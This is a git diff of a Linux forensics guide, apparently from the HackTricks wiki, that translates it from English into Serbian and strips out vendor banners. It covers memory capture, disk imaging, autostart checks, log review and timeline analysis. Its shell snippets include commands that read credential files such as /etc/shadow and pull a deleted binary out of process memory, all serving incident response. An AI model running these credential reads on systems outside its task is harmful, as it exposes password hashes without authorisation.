 - [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
 
-## References
+## Reference
 
 - [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
 
diff --git a/src/forensics/basic-forensic-methodology/linux-forensics.md b/src/forensics/basic-forensic-methodology/linux-forensics.md
index 8d505942f..fb3d366d8 100644
--- a/src/forensics/basic-forensic-methodology/linux-forensics.md
+++ b/src/forensics/basic-forensic-methodology/linux-forensics.md
@@ -1,28 +1,17 @@
 # Linux Forensics
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../../banners/hacktricks-training.md}}
 
-## Initial Information Gathering
+## Početno prikupljanje informacija
 
-### Basic Information
-
-First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries:
+### Osnovne informacije
 
+Prvo, preporučuje se da imate neki **USB** sa **dobro poznatim binarnim datotekama i bibliotekama** (možete jednostavno preuzeti ubuntu i kopirati foldere _/bin_, _/sbin_, _/lib,_ i _/lib64_), zatim montirajte USB i modifikujte env varijable da koristite te binarne datoteke:
 ```bash
 export PATH=/mnt/usb/bin:/mnt/usb/sbin
 export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
 ```
-
-Once you have configured the system to use good and known binaries you can start **extracting some basic information**:
-
+Kada konfigurišete sistem da koristi dobre i poznate binarne datoteke, možete početi sa **ekstrakcijom osnovnih informacija**:
 ```bash
 date #Date and time (Clock may be skewed, Might be at a different timezone)
 uname -a #OS info
@@ -40,50 +29,46 @@ cat /etc/passwd #Unexpected data?
 cat /etc/shadow #Unexpected data?
 find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
 ```
+#### Sumnjive informacije
 
-#### Suspicious information
+Dok prikupljate osnovne informacije, trebali biste proveriti čudne stvari kao što su:
 
-While obtaining the basic information you should check for weird things like:
+- **Root procesi** obično se pokreću sa niskim PIDS, pa ako pronađete root proces sa velikim PID-om, možete posumnjati
+- Proverite **registrovane prijave** korisnika bez shel-a unutar `/etc/passwd`
+- Proverite **hash-eve lozinke** unutar `/etc/shadow` za korisnike bez shel-a
 
-- **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect
-- Check **registered logins** of users without a shell inside `/etc/passwd`
-- Check for **password hashes** inside `/etc/shadow` for users without a shell
+### Dump memorije
 
-### Memory Dump
-
-To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
-To **compile** it, you need to use the **same kernel** that the victim machine is using.
+Da biste dobili memoriju pokrenutog sistema, preporučuje se korišćenje [**LiME**](https://github.com/504ensicsLabs/LiME).\
+Da biste ga **kompajlirali**, morate koristiti **isti kernel** koji koristi žrtvinska mašina.
 
 > [!NOTE]
-> Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it
-
-So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\
-In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them:
+> Zapamtite da **ne možete instalirati LiME ili bilo šta drugo** na žrtvinskoj mašini jer će to napraviti nekoliko promena na njoj
 
+Dakle, ako imate identičnu verziju Ubuntua, možete koristiti `apt-get install lime-forensics-dkms`\
+U drugim slučajevima, potrebno je preuzeti [**LiME**](https://github.com/504ensicsLabs/LiME) sa github-a i kompajlirati ga sa ispravnim kernel header-ima. Da biste **dobili tačne kernel header-e** žrtvinske mašine, možete jednostavno **kopirati direktorijum** `/lib/modules/` na vašu mašinu, a zatim **kompajlirati** LiME koristeći ih:
 ```bash
 make -C /lib/modules//build M=$PWD
 sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
 ```
+LiME podržava 3 **formata**:
 
-LiME supports 3 **formats**:
+- Raw (svaki segment spojен zajedno)
+- Padded (isto kao raw, ali sa nulama u desnim bitovima)
+- Lime (preporučeni format sa metapodacima)
 
-- Raw (every segment concatenated together)
-- Padded (same as raw, but with zeroes in right bits)
-- Lime (recommended format with metadata
-
-LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
+LiME se takođe može koristiti za **slanje dump-a putem mreže** umesto da se čuva na sistemu koristeći nešto poput: `path=tcp:4444`
 
 ### Disk Imaging
 
-#### Shutting down
+#### Isključivanje
 
-First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\
-There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
+Prvo, potrebno je da **isključite sistem**. Ovo nije uvek opcija jer ponekad sistem može biti produkcijski server koji kompanija ne može priuštiti da isključi.\
+Postoje **2 načina** za isključivanje sistema, **normalno isključivanje** i **"isključi kabl" isključivanje**. Prvi će omogućiti da se **procesi završe kao obično** i da se **fajl sistem** **sinhronizuje**, ali će takođe omogućiti mogućem **malware-u** da **uništi dokaze**. Pristup "isključi kabl" može doneti **neke gubitke informacija** (neće se mnogo informacija izgubiti jer smo već uzeli sliku memorije) i **malware neće imati priliku** da uradi bilo šta povodom toga. Stoga, ako **sumnjate** da može biti **malware**, jednostavno izvršite **`sync`** **komandu** na sistemu i isključite kabl.
 
-#### Taking an image of the disk
-
-It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information.
+#### Uzimanje slike diska
 
+Važno je napomenuti da **pre nego što povežete svoj računar sa bilo čim vezanim za slučaj**, morate biti sigurni da će biti **montiran kao samo za čitanje** kako biste izbegli modifikaciju bilo kojih informacija.
 ```bash
 #Create a raw copy of the disk
 dd if= of= bs=512
@@ -92,11 +77,9 @@ dd if= of= bs=512
 dcfldd if= of= bs=512 hash= hashwindow= hashlog=
 dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
 ```
-
 ### Disk Image pre-analysis
 
-Imaging a disk image with no more data.
-
+Imaging disk slike bez dodatnih podataka.
 ```bash
 #Find out if it's a disk image using "file" command
 file disk.img
@@ -108,12 +91,12 @@ raw
 #You can list supported types with
 img_stat -i list
 Supported image format types:
-        raw (Single or split raw file (dd))
-        aff (Advanced Forensic Format)
-        afd (AFF Multiple File)
-        afm (AFF with external metadata)
-        afflib (All AFFLIB image formats (including beta ones))
-        ewf (Expert Witness Format (EnCase))
+raw (Single or split raw file (dd))
+aff (Advanced Forensic Format)
+afd (AFF Multiple File)
+afm (AFF with external metadata)
+afflib (All AFFLIB image formats (including beta ones))
+ewf (Expert Witness Format (EnCase))
 
 #Data of the image
 fsstat -i raw -f ext4 disk.img
@@ -149,41 +132,31 @@ r/r 16: secret.txt
 icat -i raw -f ext4 disk.img 16
 ThisisTheMasterSecret
 ```
+## Pretraga poznatog Malware-a
 
-

+### Izmenjeni sistemski fajlovi
 
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Linux nudi alate za osiguranje integriteta sistemskih komponenti, što je ključno za uočavanje potencijalno problematičnih fajlova.
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+- **RedHat-bazirani sistemi**: Koristite `rpm -Va` za sveobuhvatnu proveru.
+- **Debian-bazirani sistemi**: `dpkg --verify` za inicijalnu verifikaciju, a zatim `debsums | grep -v "OK$"` (nakon instalacije `debsums` sa `apt-get install debsums`) za identifikaciju bilo kakvih problema.
 
-## Search for known Malware
+### Malware/Rootkit detektori
 
-### Modified System Files
-
-Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files.
-
-- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check.
-- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues.
-
-### Malware/Rootkit Detectors
-
-Read the following page to learn about tools that can be useful to find malware:
+Pročitajte sledeću stranicu da biste saznali o alatima koji mogu biti korisni za pronalaženje malware-a:
 
 {{#ref}}
 malware-analysis.md
 {{#endref}}
 
-## Search installed programs
+## Pretraga instaliranih programa
 
-To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories.
+Da biste efikasno pretražili instalirane programe na Debian i RedHat sistemima, razmotrite korišćenje sistemskih logova i baza podataka zajedno sa ručnim proverama u uobičajenim direktorijumima.
 
-- For Debian, inspect _**`/var/lib/dpkg/status`**_ and _**`/var/log/dpkg.log`**_ to fetch details about package installations, using `grep` to filter for specific information.
-- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages.
-
-To uncover software installed manually or outside of these package managers, explore directories like _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, and _**`/sbin`**_. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs.
+- Za Debian, proverite _**`/var/lib/dpkg/status`**_ i _**`/var/log/dpkg.log`**_ da biste dobili detalje o instalacijama paketa, koristeći `grep` za filtriranje specifičnih informacija.
+- RedHat korisnici mogu upititi RPM bazu podataka sa `rpm -qa --root=/mntpath/var/lib/rpm` da bi prikazali instalirane pakete.
 
+Da biste otkrili softver instaliran ručno ili van ovih menadžera paketa, istražite direktorijume kao što su _**`/usr/local`**_, _**`/opt`**_, _**`/usr/sbin`**_, _**`/usr/bin`**_, _**`/bin`**_, i _**`/sbin`**_. Kombinujte liste direktorijuma sa sistemskim komandama kako biste identifikovali izvršne fajlove koji nisu povezani sa poznatim paketima, čime poboljšavate pretragu za svim instaliranim programima.
 ```bash
 # Debian package and log details
 cat /var/lib/dpkg/status | grep -E "Package:|Status:"
@@ -199,29 +172,17 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
 # Find exacuable files
 find / -type f -executable | grep 
 ```
+## Oporavak Izbrisanih Pokrenutih Binarnih Fajlova
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
-## Recover Deleted Running Binaries
-
-Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it
-
+Zamislite proces koji je izvršen iz /tmp/exec i zatim obrisan. Moguće je da se izvuče.
 ```bash
 cd /proc/3746/ #PID with the exec file deleted
 head -1 maps #Get address of the file. It was 08048000-08049000
 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
 ```
+## Inspekcija lokacija za automatsko pokretanje
 
-## Inspect Autostart locations
-
-### Scheduled Tasks
-
+### Zakazani zadaci
 ```bash
 cat /var/spool/cron/crontabs/*  \
 /var/spool/cron/atjobs \
@@ -235,61 +196,60 @@ cat /var/spool/cron/crontabs/*  \
 #MacOS
 ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
 ```
+### Usluge
 
-### Services
+Putanje gde se zlonamerni softver može instalirati kao usluga:
 
-Paths where a malware could be installed as a service:
+- **/etc/inittab**: Poziva skripte inicijalizacije kao što su rc.sysinit, usmeravajući dalje na skripte za pokretanje.
+- **/etc/rc.d/** i **/etc/rc.boot/**: Sadrže skripte za pokretanje usluga, pri čemu se potonja nalazi u starijim verzijama Linux-a.
+- **/etc/init.d/**: Koristi se u određenim verzijama Linux-a kao što je Debian za čuvanje skripti za pokretanje.
+- Usluge se takođe mogu aktivirati putem **/etc/inetd.conf** ili **/etc/xinetd/**, u zavisnosti od varijante Linux-a.
+- **/etc/systemd/system**: Direktorijum za skripte menadžera sistema i usluga.
+- **/etc/systemd/system/multi-user.target.wants/**: Sadrži linkove do usluga koje treba pokrenuti u višekorisničkom režimu.
+- **/usr/local/etc/rc.d/**: Za prilagođene ili usluge trećih strana.
+- **\~/.config/autostart/**: Za automatske aplikacije specifične za korisnika, koje mogu biti skriveno mesto za zlonamerni softver usmeren na korisnike.
+- **/lib/systemd/system/**: Podrazumevane jedinice sistema koje obezbeđuju instalirani paketi.
 
-- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts.
-- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions.
-- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts.
-- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant.
-- **/etc/systemd/system**: A directory for system and service manager scripts.
-- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel.
-- **/usr/local/etc/rc.d/**: For custom or third-party services.
-- **\~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware.
-- **/lib/systemd/system/**: System-wide default unit files provided by installed packages.
+### Kernel moduli
 
-### Kernel Modules
+Linux kernel moduli, često korišćeni od strane zlonamernog softvera kao komponenti rootkita, učitavaju se prilikom pokretanja sistema. Direktorijumi i datoteke kritične za ove module uključuju:
 
-Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include:
+- **/lib/modules/$(uname -r)**: Sadrži module za trenutnu verziju kernela.
+- **/etc/modprobe.d**: Sadrži konfiguracione datoteke za kontrolu učitavanja modula.
+- **/etc/modprobe** i **/etc/modprobe.conf**: Datoteke za globalne postavke modula.
 
-- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version.
-- **/etc/modprobe.d**: Contains configuration files to control module loading.
-- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings.
+### Druge lokacije za automatsko pokretanje
 
-### Other Autostart Locations
+Linux koristi razne datoteke za automatsko izvršavanje programa prilikom prijavljivanja korisnika, potencijalno skrivajući zlonamerni softver:
 
-Linux employs various files for automatically executing programs upon user login, potentially harboring malware:
+- **/etc/profile.d/**\*, **/etc/profile**, i **/etc/bash.bashrc**: Izvršavaju se za bilo koju prijavu korisnika.
+- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, i **\~/.config/autostart**: Datoteke specifične za korisnika koje se pokreću prilikom njihove prijave.
+- **/etc/rc.local**: Izvršava se nakon što su sve sistemske usluge pokrenute, označavajući kraj prelaska na višekorisničko okruženje.
 
-- **/etc/profile.d/**\*, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login.
-- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, and **\~/.config/autostart**: User-specific files that run upon their login.
-- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment.
+## Istraži logove
 
-## Examine Logs
+Linux sistemi prate aktivnosti korisnika i događaje sistema kroz razne log datoteke. Ovi logovi su ključni za identifikaciju neovlašćenog pristupa, infekcija zlonamernim softverom i drugih bezbednosnih incidenata. Ključne log datoteke uključuju:
 
-Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include:
-
-- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities.
-- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins.
-  - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events.
-- **/var/log/boot.log**: Contains system startup messages.
-- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services.
-- **/var/log/kern.log**: Stores kernel messages, including errors and warnings.
-- **/var/log/dmesg**: Holds device driver messages.
-- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations.
-- **/var/log/cron**: Logs cron job executions.
-- **/var/log/daemon.log**: Tracks background service activities.
-- **/var/log/btmp**: Documents failed login attempts.
-- **/var/log/httpd/**: Contains Apache HTTPD error and access logs.
-- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities.
-- **/var/log/xferlog**: Records FTP file transfers.
-- **/var/log/**: Always check for unexpected logs here.
+- **/var/log/syslog** (Debian) ili **/var/log/messages** (RedHat): Zabeležavaju poruke i aktivnosti širom sistema.
+- **/var/log/auth.log** (Debian) ili **/var/log/secure** (RedHat): Beleže pokušaje autentifikacije, uspešne i neuspešne prijave.
+- Koristite `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` za filtriranje relevantnih događaja autentifikacije.
+- **/var/log/boot.log**: Sadrži poruke o pokretanju sistema.
+- **/var/log/maillog** ili **/var/log/mail.log**: Logovi aktivnosti email servera, korisni za praćenje usluga vezanih za email.
+- **/var/log/kern.log**: Čuva poruke kernela, uključujući greške i upozorenja.
+- **/var/log/dmesg**: Sadrži poruke drajvera uređaja.
+- **/var/log/faillog**: Beleži neuspešne pokušaje prijave, pomažući u istragama bezbednosnih proboja.
+- **/var/log/cron**: Logovi izvršavanja cron poslova.
+- **/var/log/daemon.log**: Prati aktivnosti pozadinskih usluga.
+- **/var/log/btmp**: Dokumentuje neuspešne pokušaje prijave.
+- **/var/log/httpd/**: Sadrži Apache HTTPD greške i logove pristupa.
+- **/var/log/mysqld.log** ili **/var/log/mysql.log**: Logovi aktivnosti MySQL baze podataka.
+- **/var/log/xferlog**: Beleži FTP prenose datoteka.
+- **/var/log/**: Uvek proverite za neočekivane logove ovde.
 
 > [!NOTE]
-> Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
+> Linux sistemski logovi i audit pod-sistemi mogu biti onemogućeni ili obrisani tokom upada ili incidenta sa zlonamernim softverom. Pošto logovi na Linux sistemima obično sadrže neke od najkorisnijih informacija o zlonamernim aktivnostima, napadači ih rutinski brišu. Stoga, prilikom ispitivanja dostupnih log datoteka, važno je tražiti praznine ili neuredne unose koji bi mogli biti indikacija brisanja ili manipulacije.
 
-**Linux maintains a command history for each user**, stored in:
+**Linux održava istoriju komandi za svakog korisnika**, koja se čuva u:
 
 - \~/.bash_history
 - \~/.zsh_history
@@ -297,42 +257,39 @@ Linux systems track user activities and system events through various log files.
 - \~/.python_history
 - \~/.\*\_history
 
-Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins.
+Pored toga, komanda `last -Faiwx` pruža listu prijava korisnika. Proverite je za nepoznate ili neočekivane prijave.
 
-Check files that can grant extra rprivileges:
+Proverite datoteke koje mogu dodeliti dodatne privilegije:
 
-- Review `/etc/sudoers` for unanticipated user privileges that may have been granted.
-- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted.
-- Examine `/etc/groups` to identify any unusual group memberships or permissions.
-- Examine `/etc/passwd` to identify any unusual group memberships or permissions.
+- Pregledajte `/etc/sudoers` za neočekivane privilegije korisnika koje su možda dodeljene.
+- Pregledajte `/etc/sudoers.d/` za neočekivane privilegije korisnika koje su možda dodeljene.
+- Istražite `/etc/groups` da identifikujete bilo kakva neobična članstva u grupama ili dozvole.
+- Istražite `/etc/passwd` da identifikujete bilo kakva neobična članstva u grupama ili dozvole.
 
-Some apps alse generates its own logs:
+Neke aplikacije takođe generišu svoje logove:
 
-- **SSH**: Examine _\~/.ssh/authorized_keys_ and _\~/.ssh/known_hosts_ for unauthorized remote connections.
-- **Gnome Desktop**: Look into _\~/.recently-used.xbel_ for recently accessed files via Gnome applications.
-- **Firefox/Chrome**: Check browser history and downloads in _\~/.mozilla/firefox_ or _\~/.config/google-chrome_ for suspicious activities.
-- **VIM**: Review _\~/.viminfo_ for usage details, such as accessed file paths and search history.
-- **Open Office**: Check for recent document access that may indicate compromised files.
-- **FTP/SFTP**: Review logs in _\~/.ftp_history_ or _\~/.sftp_history_ for file transfers that might be unauthorized.
-- **MySQL**: Investigate _\~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities.
-- **Less**: Analyze _\~/.lesshst_ for usage history, including viewed files and commands executed.
-- **Git**: Examine _\~/.gitconfig_ and project _.git/logs_ for changes to repositories.
+- **SSH**: Istražite _\~/.ssh/authorized_keys_ i _\~/.ssh/known_hosts_ za neovlašćene udaljene konekcije.
+- **Gnome Desktop**: Pogledajte _\~/.recently-used.xbel_ za nedavno pristupane datoteke putem Gnome aplikacija.
+- **Firefox/Chrome**: Proverite istoriju pretraživača i preuzimanja u _\~/.mozilla/firefox_ ili _\~/.config/google-chrome_ za sumnjive aktivnosti.
+- **VIM**: Pregledajte _\~/.viminfo_ za detalje o korišćenju, kao što su pristupane putanje datoteka i istorija pretrage.
+- **Open Office**: Proverite za nedavni pristup dokumentima koji mogu ukazivati na kompromitovane datoteke.
+- **FTP/SFTP**: Pregledajte logove u _\~/.ftp_history_ ili _\~/.sftp_history_ za prenose datoteka koji bi mogli biti neovlašćeni.
+- **MySQL**: Istražite _\~/.mysql_history_ za izvršene MySQL upite, što može otkriti neovlašćene aktivnosti u bazi podataka.
+- **Less**: Analizirajte _\~/.lesshst_ za istoriju korišćenja, uključujući pregledane datoteke i izvršene komande.
+- **Git**: Istražite _\~/.gitconfig_ i projekat _.git/logs_ za promene u repozitorijumima.
 
-### USB Logs
+### USB logovi
 
-[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
+[**usbrip**](https://github.com/snovvcrash/usbrip) je mali komad softvera napisan u čistom Python 3 koji analizira Linux log datoteke (`/var/log/syslog*` ili `/var/log/messages*` u zavisnosti od distribucije) za konstruisanje tabela istorije događaja USB-a.
 
-It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list).
-
-### Installation
+Zanimljivo je **znati sve USB uređaje koji su korišćeni** i biće korisnije ako imate ovlašćenu listu USB uređaja da pronađete "događaje kršenja" (korišćenje USB uređaja koji nisu na toj listi).
 
+### Instalacija
 ```bash
 pip3 install usbrip
 usbrip ids download #Download USB ID database
 ```
-
-### Examples
-
+### Primeri
 ```bash
 usbrip events history #Get USB history of your curent linux machine
 usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
@@ -340,40 +297,30 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR
 usbrip ids download #Downlaod database
 usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
 ```
+Više primera i informacija unutar github-a: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
 
-More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
+## Pregled korisničkih naloga i aktivnosti prijavljivanja
 
-

+Istražite _**/etc/passwd**_, _**/etc/shadow**_ i **bezbednosne logove** za neobična imena ili naloge koji su kreirani i ili korišćeni u bliskoj blizini poznatih neovlašćenih događaja. Takođe, proverite moguće sudo brute-force napade.\
+Pored toga, proverite datoteke kao što su _**/etc/sudoers**_ i _**/etc/groups**_ za neočekivane privilegije dodeljene korisnicima.\
+Na kraju, potražite naloge sa **bez lozinki** ili **lako pogađanim** lozinkama.
 
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+## Istraživanje fajl sistema
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+### Analiza struktura fajl sistema u istraživanju malvera
 
-## Review User Accounts and Logon Activities
+Kada istražujete incidente sa malverom, struktura fajl sistema je ključni izvor informacija, otkrivajući kako redosled događaja tako i sadržaj malvera. Međutim, autori malvera razvijaju tehnike za ometanje ove analize, kao što su modifikovanje vremenskih oznaka fajlova ili izbegavanje fajl sistema za skladištenje podataka.
 
-Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\
-Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
-Finally, look for accounts with **no passwords** or **easily guessed** passwords.
-
-## Examine File System
-
-### Analyzing File System Structures in Malware Investigation
-
-When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage.
-
-To counter these anti-forensic methods, it's essential to:
-
-- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data.
-- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers.
-- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files.
-- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content.
-- **Identify setuid root files** using the command: `find / -user root -perm -04000 -print` This finds files with elevated permissions, which could be abused by attackers.
-- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans.
-- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together.
-- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware.
+Da biste se suprotstavili ovim anti-forenzičkim metodama, važno je:
 
+- **Sprovesti temeljnu analizu vremenske linije** koristeći alate kao što su **Autopsy** za vizualizaciju vremenskih linija događaja ili **Sleuth Kit's** `mactime` za detaljne podatke o vremenskoj liniji.
+- **Istražiti neočekivane skripte** u sistemskom $PATH, koje mogu uključivati shell ili PHP skripte koje koriste napadači.
+- **Istražiti `/dev` za atipične fajlove**, jer tradicionalno sadrži specijalne fajlove, ali može sadržati i fajlove povezane sa malverom.
+- **Pretražiti skrivene fajlove ili direktorijume** sa imenima kao što su ".. " (tačka tačka razmak) ili "..^G" (tačka tačka kontrola-G), koji mogu prikrivati zlonamerni sadržaj.
+- **Identifikovati setuid root fajlove** koristeći komandu: `find / -user root -perm -04000 -print` Ovo pronalazi fajlove sa povišenim privilegijama, koje napadači mogu zloupotrebiti.
+- **Pregledati vremenske oznake brisanja** u inode tabelama kako bi se uočila masovna brisanja fajlova, što može ukazivati na prisustvo rootkit-ova ili trojanaca.
+- **Inspektovati uzastopne inode** za obližnje zlonamerne fajlove nakon identifikacije jednog, jer su možda postavljeni zajedno.
+- **Proveriti uobičajene binarne direktorijume** (_/bin_, _/sbin_) za nedavno modifikovane fajlove, jer bi ovi mogli biti izmenjeni od strane malvera.
 ````bash
 # List recent files in a directory:
 ls -laR --sort=time /bin```
@@ -381,58 +328,43 @@ ls -laR --sort=time /bin```
 # Sort files in a directory by inode:
 ls -lai /bin | sort -n```
 ````
-
 > [!NOTE]
-> Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
+> Imajte na umu da **napadač** može **modifikovati** **vreme** kako bi **datoteke izgledale** **legitimno**, ali ne može **modifikovati** **inode**. Ako otkrijete da **datoteka** pokazuje da je kreirana i modifikovana u **isto vreme** kao i ostale datoteke u istoj fascikli, ali je **inode** **neočekivano veći**, onda su **vremenske oznake te datoteke modifikovane**.
 
-## Compare files of different filesystem versions
+## Upoređivanje datoteka različitih verzija datotečnog sistema
 
-### Filesystem Version Comparison Summary
+### Sažetak upoređivanja verzija datotečnog sistema
 
-To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands:
-
-- **To find new files**, compare two directories:
+Da bismo uporedili verzije datotečnog sistema i precizno odredili promene, koristimo pojednostavljene `git diff` komande:
 
+- **Da pronađete nove datoteke**, uporedite dve fascikle:
 ```bash
 git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
 ```
-
-- **For modified content**, list changes while ignoring specific lines:
-
+- **Za izmenjen sadržaj**, navedite promene ignorišući specifične linije:
 ```bash
 git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
 ```
-
-- **To detect deleted files**:
-
+- **Da biste otkrili obrisane fajlove**:
 ```bash
 git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
 ```
+- **Opcije filtriranja** (`--diff-filter`) pomažu u sužavanju na specifične promene kao što su dodati (`A`), obrisani (`D`), ili izmenjeni (`M`) fajlovi.
+- `A`: Dodati fajlovi
+- `C`: Kopirani fajlovi
+- `D`: Obrisani fajlovi
+- `M`: Izmenjeni fajlovi
+- `R`: Preimenovani fajlovi
+- `T`: Promene tipa (npr., fajl u symlink)
+- `U`: Neusaglašeni fajlovi
+- `X`: Nepoznati fajlovi
+- `B`: Pokvareni fajlovi
 
